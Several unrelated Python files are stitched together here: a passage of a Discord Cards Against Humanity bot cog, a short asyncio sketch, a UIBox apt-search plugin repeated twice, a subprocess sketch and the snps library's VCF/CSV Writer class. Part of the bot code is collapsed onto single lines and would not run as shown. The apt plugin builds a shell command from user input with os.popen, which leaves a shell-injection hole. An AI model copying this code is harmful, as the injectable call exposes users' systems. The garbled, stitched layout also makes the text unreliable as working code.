        await ctx.author.send(f"You submitted your {cardSpeak}!")
        await self.checkSubmissions(ctx, userGame, user)

    @commands.command()
    async def pick(self, ctx, *, card=None):
        """As the judge - pick the winning card(s)."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            return await ctx.author.send(msg)
        userGame["Time"] = int(time.time())
        isJudge = False
        for member in userGame["Members"]:
            if member["User"] == ctx.author:
                member["Time"] = int(time.time())
                user = member
                index = userGame["Members"].index(member)
                if index == userGame["Judge"]:
                    isJudge = True
        if not isJudge:
            msg = "You're not the judge - I guess you'll have to wait your turn."
return await ctx.author.send(msg) # Am judge totalUsers = len(userGame["Members"]) - 1 submitted = len(userGame["Submitted"]) if submitted < totalUsers: if totalUsers - submitted == 1: msg = "Still waiting on 1 card..." else: msg = f"Still waiting on {totalUsers - submitted} cards..." await ctx.author.send(msg) return try: card = int(card) - 1 except Exception: card = -1 if card < 0 or card >= totalUsers: return await ctx.author.send(f"Your pick must be between 1 and {totalUsers}.") # Pick is good! await self.winningCard(ctx, userGame, card) @commands.command() async def hand(self, ctx): """Shows your hand.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) await self.showHand(ctx, ctx.author) userGame["Time"] = currentTime = int(time.time()) @commands.command() async def newcah(self, ctx): """Starts a new Cards Against Humanity game.""" # if not await self.checkPM(ctx.message): # return # Check if the user is already in game userGame = await self.userGame(ctx.author) if userGame: # Already in a game return await ctx.author.send( f"You're already in a game (id: *{userGame['ID']}*)\nType `{ctx.prefix}leavecah` to leave that game." ) # Not in a game - create a new one gameID = self.randomID() currentTime = int(time.time()) newGame = { "ID": gameID, "Members": [], "Discard": [], "BDiscard": [], "Judge": -1, "Time": currentTime, "BlackCard": None, "Submitted": [], "NextHand": asyncio.Event(), "Judging": False, "Timeout": True, } member = { "ID": ctx.author.id, "User": ctx.author, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": False, "Creator": True, "Task": None, "Time": currentTime, } newGame["Members"].append(member) newGame["Running"] = True task = self.bot.loop.create_task(self.gameCheckLoop(ctx, newGame)) task = self.bot.loop.create_task(self.checkCards(ctx, newGame)) self.games.append(newGame) # Tell the user they created a new game and list its ID await ctx.message.channel.send(f"You created game id: *{gameID}*") await self.drawCards(ctx.author) # await self.showHand(ctx, ctx.author) # await self.nextPlay(ctx, newGame) @commands.command() async def leavecah(self, ctx): """Leaves the current game you're in.""" removeCheck = await self.removeMember(ctx.author) if not removeCheck: msg = "You are not in a game." await ctx.message.channel.send(msg) return if self.checkGame(removeCheck): # await self.nextPlay(ctx, removeCheck) """# Start the game loop event = removeCheck['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Player was removed - try to handle it calmly... await self.checkSubmissions(ctx, removeCheck) @commands.command() async def joincah(self, ctx, *, id=None): """Join a Cards Against Humanity game. If no id or user is passed, joins a random game.""" # if not await self.checkPM(ctx.message): # return # Check if the user is already in game userGame = await self.userGame(ctx.author) isCreator = False if userGame: # Already in a game return await ctx.message.channel.send( f"You're already in a game (id: *{userGame['ID']}*)\nType `{ctx.prefix}leavecah` to leave that game." 
) if len(self.games): if id: game = self.gameForID(id) if game == None: # That id doesn't exist - or is possibly a user # If user, has to be joined from server chat if not ctx.message.guild: return await ctx.message.channel.send( f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user." ) else: # We have a server - let's try for a user member = self.memberforname(id, ctx.message.guild) if not member: # Couldn't find user! return await ctx.message.channel.send( f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user." ) # Have a user - check if they're in a game game = await self.userGame(member) if not game: # That user is NOT in a game! return await ctx.message.channel.send( "That user doesn't appear to be playing." ) else: game = random.choice(self.games) else: # No games - create a new one gameID = self.randomID() currentTime = int(time.time()) game = { "ID": gameID, "Members": [], "Discard": [], "BDiscard": [], "Judge": -1, "Time": currentTime, "BlackCard": None, "Submitted": [], "NextHand": asyncio.Event(), "Judging": False, "Timeout": True, } game["Running"] = True task = self.bot.loop.create_task(self.gameCheckLoop(ctx, game)) task = self.bot.loop.create_task(self.checkCards(ctx, game)) self.games.append(game) # Tell the user they created a new game and list its ID await ctx.message.channel.send(f"**You created game id:** ***{gameID}***") isCreator = True # Tell everyone else you joined for member in game["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.displayname(ctx.author)}*** **joined the game!**") # We got a user! currentTime = int(time.time()) member = { "ID": ctx.author.id, "User": ctx.author, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": False, "Creator": isCreator, "Task": None, "Time": currentTime, } game["Members"].append(member) await self.drawCards(ctx.author) if len(game["Members"]) == 1: # Just created the game await self.drawCards(ctx.author) else: await ctx.message.channel.send( f"**You've joined game id:** ***{game['ID']}!***\n\nThere are *{len(game['Members'])} users* in this game." ) # Check if adding put us at minimum members if len(game["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, game) # Reset judging flag to retrigger actions game["Judging"] = False # Show the user the current card and their hand await self.showPlay(ctx, member["User"]) await self.showHand(ctx, member["User"]) event = game["NextHand"] game["Time"] = int(time.time()) @commands.command() async def joinbot(self, ctx): """Adds a bot to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." 
) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") # We can get another bot! botID = self.randomBotID(userGame) lobot = { "ID": botID, "User": None, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": True, "Creator": False, "Task": None, } userGame["Members"].append(lobot) await self.drawCards(lobot["ID"]) for member in userGame["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.botName} ({botID})*** **joined the game!**") # await self.nextPlay(ctx, userGame) # Check if adding put us at minimum members if len(userGame["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = userGame["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, userGame) # Reset judging flag to retrigger actions userGame["Judging"] = False # Schedule stuff task = asyncio.ensure_future(self.botPick(ctx, lobot, userGame)) lobot["Task"] = task @commands.command() async def joinbots(self, ctx, number=None): """Adds bots to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) if number == None: # No number specified - let's add the max number of bots number = self.maxBots - botCount try: number = int(number) except Exception: msg = "Number of bots to add must be an integer." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") if number > (self.maxBots - botCount): number = self.maxBots - botCount if number == 1: msg = f"**Adding {number} bot:**\n\n" else: msg = f"**Adding {number} bots:**\n\n" newBots = [] for i in range(0, number): # We can get another bot! 
            botID = self.randomBotID(userGame)
            lobot = {
                "ID": botID,
                "User": None,
                "Points": 0,
                "Won": [],
                "Hand": [],
                "Laid": False,
                "Refreshed": False,
                "IsBot": True,
                "Creator": False,
                "Task": None,
            }
            userGame["Members"].append(lobot)
            newBots.append(lobot)
            await self.drawCards(lobot["ID"])
            msg += f"***{self.botName} ({botID})*** **joined the game!**\n"
            # await self.nextPlay(ctx, userGame)
        for member in userGame["Members"]:
            if member["IsBot"]:
                continue
            await member["User"].send(msg)
        # Check if adding put us at minimum members
        if len(userGame["Members"]) - number < self.minMembers:
            # It was - *actually* start a game
            event = userGame["NextHand"]
            self.bot.loop.call_soon_threadsafe(event.set)
        else:
            # It was not - just incorporate new players
            await self.checkSubmissions(ctx, userGame)
            # Reset judging flag to retrigger actions
            userGame["Judging"] = False
            for bot in newBots:
                # Schedule stuff
                task = asyncio.ensure_future(self.botPick(ctx, bot, userGame))
                bot["Task"] = task

    @commands.command()
    async def removebot(self, ctx, *, id=None):
        """Removes a bot from the game. Can only be done by the player who created the game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        botCount = 0
        for member in userGame["Members"]:
            if member["IsBot"]:
                botCount += 1
                continue
            if member["User"] == ctx.author:
                if not member["Creator"]:
                    # You didn't make this game
                    return await ctx.author.send(
                        "Only the player that created the game can remove bots."
                    )
                member["Time"] = int(time.time())
        # We are the creator - let's check the number of bots
        if id == None:
            # Just remove the first bot we find
            for member in userGame["Members"]:
                if member["IsBot"]:
                    await self.removeMember(member["ID"])
                    """# Start the game loop
                    event = userGame['NextHand']
                    self.bot.loop.call_soon_threadsafe(event.set)"""
                    # Bot was removed - try to handle it calmly...
                    return await self.checkSubmissions(ctx, userGame)
            msg = "No bots to remove!"
            await ctx.author.send(msg)
            return
        else:
            # Remove a bot by id
            if not await self.removeMember(id):
                # not found
                return await ctx.author.send(
                    f"I couldn't locate that bot on this game. If you're trying to remove a player, try the `{ctx.prefix}removeplayer [name]` command."
                )
        # await self.nextPlay(ctx, userGame)
        """# Start the game loop
        event = userGame['NextHand']
        self.bot.loop.call_soon_threadsafe(event.set)"""
        # Bot was removed - let's try to handle it calmly...
        await self.checkSubmissions(ctx, userGame)

    @commands.command()
    async def cahgames(self, ctx):
        """Displays up to 10 CAH games in progress."""
        shuffledGames = list(self.games)
        random.shuffle(shuffledGames)
        if not len(shuffledGames):
            await ctx.message.channel.send("No games being played currently.")
            return
        max = 10
        if len(shuffledGames) < 10:
            max = len(shuffledGames)
        msg = "__Current CAH Games__:\n\n"
        for i in range(0, max):
            playerCount = 0
            botCount = 0
            gameID = shuffledGames[i]["ID"]
            for j in shuffledGames[i]["Members"]:
                if j["IsBot"]:
                    botCount += 1
                else:
                    playerCount += 1
            botText = f"{botCount} bot"
            if not botCount == 1:
                botText += "s"
            playerText = f"{playerCount} player"
            if not playerCount == 1:
                playerText += "s"
            msg += f"{i + 1}. 
{gameID} - {playerText} | {botText}\n" await ctx.message.channel.send(msg) @commands.command() async def score(self, ctx): """Display the score of the current game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) stat_embed = discord.Embed(color=discord.Color.purple()) stat_embed.set_author(name="Current Score") stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame['ID']}") await ctx.author.send(embed=stat_embed) users = sorted(userGame["Members"], key=lambda card: int(card["Points"]), reverse=True) msg = "" i = 0 if len(users) > 10: msg += f"__10 of {len(users)} Players:__\n\n" else: msg += "__Players:__\n\n" for user in users: i += 1 if i > 10: break if user["Points"] == 1: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - 1 point\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - 1 point\n" else: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - {user['Points']} points\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - {user['Points']} points\n" await ctx.author.send(msg) @commands.command() async def laid(self, ctx): """Shows who laid their cards and who hasn't.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) stat_embed = discord.Embed(color=discord.Color.purple()) stat_embed.set_author(name="Card Check") stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame['ID']}") await ctx.author.send(embed=stat_embed) users = sorted(userGame["Members"], key=lambda card: int(card["Laid"])) msg = "" i = 0 if len(users) > 10: msg += f"__10 of {len(users)} Players:__\n\n" else: msg += "__Players:__\n\n" for user in users: if len(userGame["Members"]) >= self.minMembers: if user == userGame["Members"][userGame["Judge"]]: continue i += 1 if i > 10: break if user["Laid"]: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - Cards are in.\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - Cards are in.\n" else: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - Waiting for cards...\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - Waiting for cards...\n" await ctx.author.send(msg) @commands.command() async def removeplayer(self, ctx, *, name=None): """Removes a player from the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can remove players." 
await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if name == None: # Nobody named! msg = "Okay, I removed... no one from the game..." await ctx.author.send(msg) return # Let's get the person either by name, or by id nameID = "".join(list(filter(str.isdigit, name))) for member in userGame["Members"]: toRemove = False if member["IsBot"]: continue if name.lower() == self.displayname(member["User"]).lower(): # Got em! toRemove = True elif nameID == member["ID"]: # Got em! toRemove = True if toRemove: await self.removeMember(member["ID"]) break # await self.nextPlay(ctx, userGame) if toRemove: """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Player was removed - try to handle it calmly... await self.checkSubmissions(ctx, userGame) else: msg = f"I couldn't locate that player on this game. If you're trying to remove a bot, try the `{ctx.prefix}removebot [id]` command." return await ctx.author.send(msg) @commands.command() async def flushhand(self, ctx): """Flushes the cards in your hand - can only be done once per game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) if userGame["Judge"] == -1: msg = "The game hasn't started yet. Probably not worth it to flush your hand before you get it..." await ctx.author.send(msg) return for member in userGame["Members"]: if member["IsBot"]: continue if member["User"] == ctx.author: member["Time"] = int(time.time()) # Found us! if member["Refreshed"]: # Already flushed their hand msg = "You have already flushed your hand this game." await ctx.author.send(msg) return else: member["Hand"] = [] await self.drawCards(member["ID"]) member["Refreshed"] = True msg = "Flushing your hand!" await ctx.author.send(msg) await self.showHand(ctx, ctx.author) return @commands.command() async def idlekick(self, ctx, *, setting=None): """Sets whether or not to kick members if idle for 5 minutes or more. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can remove bots." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if setting == None: # Output idle kick status if userGame["Timeout"]: await ctx.message.channel.send("Idle kick is enabled.") else: await ctx.message.channel.send("Idle kick is disabled.") return elif setting.lower() == "yes" or setting.lower() == "on" or setting.lower() == "true": setting = True elif setting.lower() == "no" or setting.lower() == "off" or setting.lower() == "false": setting = False else: setting = None if setting == True: if userGame["Timeout"] == True: msg = "Idle kick remains enabled." else: msg = "Idle kick now enabled." 
for member in userGame["Members"]: member["Time"] = int(time.time()) else: if userGame["Timeout"] == False: msg = "Idle kick remains disabled." else: msg = "Idle kick now disabled." userGame["Timeout"] = setting await ctx.message.channel.send(msg) @commands.command() async def cahcredits(self, ctx): """Code credits.""" await ctx.send( "```\nThis cog is made possible by CorpBot.\nPlease visit https://github.com/corpnewt/CorpBot.py for more information.\n```" )
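
# Hands in this cog advance through the game's "NextHand" asyncio.Event:
# gameCheckLoop clears the event, deals via nextPlay, then blocks on wait()
# until winningCard (or a join) fires call_soon_threadsafe(event.set). A
# stripped-down sketch of that handshake follows; `game_loop`, the two demo
# rounds, and the sleeps are illustrative stand-ins, not the cog's own code.

import asyncio


async def game_loop(next_hand: asyncio.Event):
    for round_no in range(2):              # two demo rounds instead of `while Running`
        next_hand.clear()                  # arm the event for this hand
        print(f"dealing hand {round_no}")  # stand-in for nextPlay()
        await next_hand.wait()             # park until someone ends the round


async def main():
    next_hand = asyncio.Event()
    loop_task = asyncio.create_task(game_loop(next_hand))
    for _ in range(2):
        await asyncio.sleep(0.1)           # pretend a judge picked a winner
        next_hand.set()                    # wake game_loop for the next hand
    await loop_task


asyncio.run(main())
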
#!/usr/bin/python3

import os

from UIBox import pkg


def Results(parent):
    if not parent.text:
        return [{
            "title": "Start typing the package name",
            "subtitle": "Remember, you can use regular expressions. For example: apty ^steam",
            "key": ""
        }]

    data = os.popen("apt-cache search " + parent.text, "r").readlines()

    if not data:
        return [
            {
                "title": "No package " + parent.text + " could be found",
                "highlightable": False,
                "subtitle": "Are your repositories updated? (sudo apt update) "
                "Remember, you can use regular expressions. For example: apty ^steam",
            }
        ]

    results = []
    # Clamp to the available results so short result lists don't raise IndexError.
    for i in range(min(len(data), int(parent.settings("max_results", 12)))):
        package = data[i]
        package_name = package.split(" - ")[0]
        package_description = package.split(" - ")[1]
        results.append(
            {
                "title": package_name,
                "subtitle": package_description,
                "func": lambda p, i: pkg.run_app(f"{parent.settings('term', 'terminal')} '{parent.settings('cmd', 'sudo apt install -u')} {i.title}'"),
                "ctrl_enter": lambda p, i: parent.text_copy(i.title)
            }
        )
    return results
#!/usr/bin/python3

import os

from UIBox import pkg


def Results(parent):
    if not parent.text:
        return [{
            "title": "Start typing the package name",
            "subtitle": "Remember, you can use regular expressions. For example: apty ^steam",
            "key": ""
        }]

    data = os.popen("apt-cache search " + parent.text, "r").readlines()

    if not data:
        return [
            {
                "title": "No package " + parent.text + " could be found",
                "highlightable": False,
                "subtitle": "Are your repositories updated? (sudo apt update) "
                "Remember, you can use regular expressions. For example: apty ^steam",
            }
        ]

    results = []
    # Clamp to the available results so short result lists don't raise IndexError.
    for i in range(min(len(data), int(parent.settings("max_results", 12)))):
        package = data[i]
        package_name = package.split(" - ")[0]
        package_description = package.split(" - ")[1]
        results.append(
            {
                "title": package_name,
                "subtitle": package_description,
                "func": lambda p, i: pkg.run_app(f"{parent.settings('term', 'terminal')} '{parent.settings('cmd', 'sudo apt install -u')} {i.title}'"),
                "ctrl_enter": lambda p, i: parent.text_copy(i.title)
            }
        )
    return results
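
# The plugin above builds its apt-cache command by string concatenation via
# os.popen, which gives no control over errors or encoding and is vulnerable
# to shell injection through the query text. subprocess.run with an argument
# list is the usual replacement. A hedged sketch of the same search call;
# `search_packages` is a hypothetical helper, not part of UIBox.

import subprocess


def search_packages(query: str) -> list:
    """Return (name, description) pairs from `apt-cache search`."""
    proc = subprocess.run(
        ["apt-cache", "search", query],  # list form: no shell, no injection
        capture_output=True, text=True, check=False,
    )
    results = []
    for line in proc.stdout.splitlines():
        name, _, description = line.partition(" - ")
        results.append((name, description))
    return results


print(search_packages("^steam")[:3])  # regex queries work, as in the plugin
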
""" Class for writing SNPs. """ """ BSD 3-Clause License Copyright (c) 2019, Andrew Riha All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import datetime import logging import numpy as np import pandas as pd import snps from snps.utils import save_df_as_csv, clean_str logger = logging.getLogger(__name__) class Writer: """Class for writing SNPs to files.""" def __init__(self, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Initialize a `Writer`. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` """ self._snps = snps self._filename = filename self._vcf = vcf self._atomic = atomic self._kwargs = kwargs def write(self): if self._vcf: return self._write_vcf() else: return (self._write_csv(),) @classmethod def write_file(cls, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Save SNPs to file. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ w = cls(snps=snps, filename=filename, vcf=vcf, atomic=atomic, **kwargs) return w.write() def _write_csv(self): """Write SNPs to a CSV file. 
        Returns
        -------
        str
            path to file in output directory if SNPs were saved, else empty str
        """
        filename = self._filename
        if not filename:
            ext = ".txt"

            if "sep" in self._kwargs and self._kwargs["sep"] == ",":
                ext = ".csv"

            filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{ext}"

        comment = (
            f"# Source(s): {self._snps.source}\n"
            f"# Build: {self._snps.build}\n"
            f"# Build Detected: {self._snps.build_detected}\n"
            f"# Phased: {self._snps.phased}\n"
            f"# SNPs: {self._snps.count}\n"
            f"# Chromosomes: {self._snps.chromosomes_summary}\n"
        )
        if "header" in self._kwargs:
            if isinstance(self._kwargs["header"], bool):
                if self._kwargs["header"]:
                    self._kwargs["header"] = ["chromosome", "position", "genotype"]
        else:
            self._kwargs["header"] = ["chromosome", "position", "genotype"]

        return save_df_as_csv(
            self._snps._snps,
            self._snps._output_dir,
            filename,
            comment=comment,
            atomic=self._atomic,
            **self._kwargs,
        )

    def _write_vcf(self):
        """Write SNPs to a VCF file.

        References
        ----------
        1. The Variant Call Format (VCF) Version 4.2 Specification, 8 Mar 2019,
           https://samtools.github.io/hts-specs/VCFv4.2.pdf

        Returns
        -------
        str
            path to file in output directory if SNPs were saved, else empty str
        discrepant_vcf_position : pd.DataFrame
            SNPs with discrepant positions discovered while saving VCF
        """
        filename = self._filename
        if not filename:
            filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}.vcf"

        comment = (
            f"##fileformat=VCFv4.2\n"
            f"##fileDate={datetime.datetime.utcnow().strftime('%Y%m%d')}\n"
            f'##source="{self._snps.source}; snps v{snps.__version__}; https://pypi.org/project/snps/"\n'
        )

        reference_sequence_chroms = (
            "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12",
            "13", "14", "15", "16", "17", "18", "19", "20", "21", "22",
            "X", "Y", "MT",
        )

        df = self._snps.snps

        p = self._snps._parallelizer
        tasks = []

        # skip insertions and deletions
        df = df.drop(
            df.loc[
                df["genotype"].notnull()
                & (
                    (df["genotype"].str[0] == "I")
                    | (df["genotype"].str[0] == "D")
                    | (df["genotype"].str[1] == "I")
                    | (df["genotype"].str[1] == "D")
                )
            ].index
        )

        chroms_to_drop = []
        for chrom in df["chrom"].unique():
            if chrom not in reference_sequence_chroms:
                chroms_to_drop.append(chrom)
                continue

            tasks.append(
                {
                    "resources": self._snps._resources,
                    "assembly": self._snps.assembly,
                    "chrom": chrom,
                    "snps": pd.DataFrame(df.loc[(df["chrom"] == chrom)]),
                }
            )

        # drop chromosomes without reference sequence data (e.g., unassigned PAR)
        for chrom in chroms_to_drop:
            df = df.drop(df.loc[df["chrom"] == chrom].index)

        # create the VCF representation for SNPs
        results = p(self._create_vcf_representation, tasks)

        contigs = []
        vcf = [pd.DataFrame()]
        discrepant_vcf_position = [pd.DataFrame()]
        for result in list(results):
            contigs.append(result["contig"])
            vcf.append(result["vcf"])
            discrepant_vcf_position.append(result["discrepant_vcf_position"])

        vcf = pd.concat(vcf)
        discrepant_vcf_position = pd.concat(discrepant_vcf_position)

        comment += "".join(contigs)
        comment += '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n'
        comment += "#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n"

        return (
            save_df_as_csv(
                vcf,
                self._snps._output_dir,
                filename,
                comment=comment,
                prepend_info=False,
                header=False,
                index=False,
                na_rep=".",
                sep="\t",
            ),
            discrepant_vcf_position,
        )

    def _create_vcf_representation(self, task):
        resources = task["resources"]
        assembly = task["assembly"]
        chrom = task["chrom"]
        snps = task["snps"]

        if len(snps.loc[snps["genotype"].notnull()]) == 0:
            return {
                "contig": "",
                "vcf": pd.DataFrame(),
                "discrepant_vcf_position":
pd.DataFrame(), } seqs = resources.get_reference_sequences(assembly, [chrom]) seq = seqs[chrom] contig = f'##contig=<ID={seq.ID},URL={seq.url},length={seq.length},assembly={seq.build},md5={seq.md5},species="{seq.species}">\n' snps = snps.reset_index() df = pd.DataFrame( columns=[ "CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT", "SAMPLE", ] ) df = df.astype( { "CHROM": object, "POS": np.uint32, "ID": object, "REF": object, "ALT": object, "QUAL": np.float32, "FILTER": object, "INFO": object, "FORMAT": object, "SAMPLE": object, } ) df["CHROM"] = snps["chrom"] df["POS"] = snps["pos"] df["ID"] = snps["rsid"] # drop SNPs with discrepant positions (outside reference sequence) discrepant_vcf_position = snps.loc[ (snps.pos - seq.start < 0) | (snps.pos - seq.start > seq.length - 1) ] df.drop(discrepant_vcf_position.index, inplace=True) # https://stackoverflow.com/a/24838429 df["REF"] = list(map(chr, seq.sequence[df.POS - seq.start])) df["FORMAT"] = "GT" seq.clear() df["genotype"] = snps["genotype"] temp = df.loc[df["genotype"].notnull()] # https://stackoverflow.com/a/19976286 df.loc[df["genotype"].notnull(), "ALT"] = np.vectorize(self._compute_alt)( temp["REF"], temp["genotype"] ) temp = df.loc[df["genotype"].notnull()] df.loc[df["genotype"].notnull(), "SAMPLE"] = np.vectorize( self._compute_genotype )(temp["REF"], temp["ALT"], temp["genotype"]) df.loc[df["SAMPLE"].isnull(), "SAMPLE"] = "./." del df["genotype"] return { "contig": contig, "vcf": df, "discrepant_vcf_position": discrepant_vcf_position, } def _compute_alt(self, ref, genotype): genotype_alleles = list(set(genotype)) if ref in genotype_alleles: if len(genotype_alleles) == 1: return "N" else: genotype_alleles.remove(ref) return genotype_alleles.pop(0) else: genotype_alleles.sort() return ",".join(genotype_alleles) def _compute_genotype(self, ref, alt, genotype): alleles = [ref] if self._snps.phased: separator = "|" else: separator = "/" if pd.notna(alt): alleles.extend(alt.split(",")) if len(genotype) == 2: return ( f"{alleles.index(genotype[0])}{separator}{alleles.index(genotype[1])}" ) else: return f"{alleles.index(genotype[0])}"
